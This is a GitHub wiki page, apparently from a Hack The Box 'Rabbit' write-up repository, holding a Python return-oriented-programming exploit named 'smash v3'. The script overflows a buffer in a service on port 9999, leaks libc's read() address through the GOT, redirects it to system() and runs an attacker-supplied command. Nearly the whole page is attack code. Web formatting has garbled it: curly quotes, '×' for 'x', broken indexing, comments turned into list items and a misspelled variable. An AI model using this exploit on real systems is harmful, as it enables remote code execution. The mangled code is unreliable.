smash v3 - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
import requests

addr = (‘127.0.0.1’, 9999)

cmd = sys.argv1+"\0"
#cmd = ‘ls’

libcread_offset = 0×0e8050
libcsystem_offset = 0×042510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

payload = r’GET /\AAAA’

#filler – fill buffer with A’s , thought this would be 536 – 4, but turns out to be 535
payload += ‘A’ * (535 – 4)

#overwrite RBX – offset 536
payload += ‘B’ * 8

#overwrite RBP – offset 544
payload += ‘C’ * 8

#fill before start of RSP – offset 568
payload += ‘D’ * 16

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += struct.pack(“<Q”, 0×000401787) #PPPR
someother += struct.pack(“<Q”, 4) #stdin
someother += struct.pack(“<Q”, 0×000602e28) #.dynamic addr
someother += struct.pack(“<Q”, len(cmd)) #len of cmd

#leak address of read() in randomised libc
someother += struct.pack(“<Q”, 0×400c50) #write() call loc
someother += struct.pack(“<Q”, 0×000401787) #PPPR
someother += struct.pack(“<Q”, 4) #stdout
someother += struct.pack(“<Q”, 0×000603088) #read() in GOT
someother += struct.pack(“<Q”, 8) #len

#call read@plt to overwrite the ptr stored in GOT
someother += struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += struct.pack(“<Q”, 0×000401787) #PPPR
someother += struct.pack(“<Q”, 4) #stdin
someother += struct.pack(“<Q”, 0×000603088) #read() in GOT
someother += struct.pack(“<Q”, 8) #len

#call read@plt with address of system() in libc
someother += struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += ‘FFFFFFFF’ # bogus
someother += struct.pack(“<Q”, 0×000602e28) #.dynamic addr system()

  1. libc read offset = 0×0e8050
  2. libc system offset = 0×042510

#padding – continue filler, writing into RSP
#payload += ‘E’ * 150
payload = payload + someother

s.connect(addr)

#print(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’)

s.send(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’+’\n’+’\n’)

s.send(cmd)

  1. calculate system() addr and send back
    readaddr = struct.unpack(“<Q”, s.recv(1024))0
    print “libc read() found at 0x%.8x” % readaddr
    systemaddr = readaddr – libcread_offset + libcsytem_offset
    print “libc system() found at 0x%.8x” % systemaddr
    s.send(struct.pack(“<Q”, systemaddr))

print s.recv(1024)

s.close

⚠️ **GitHub.com Fallback** ⚠️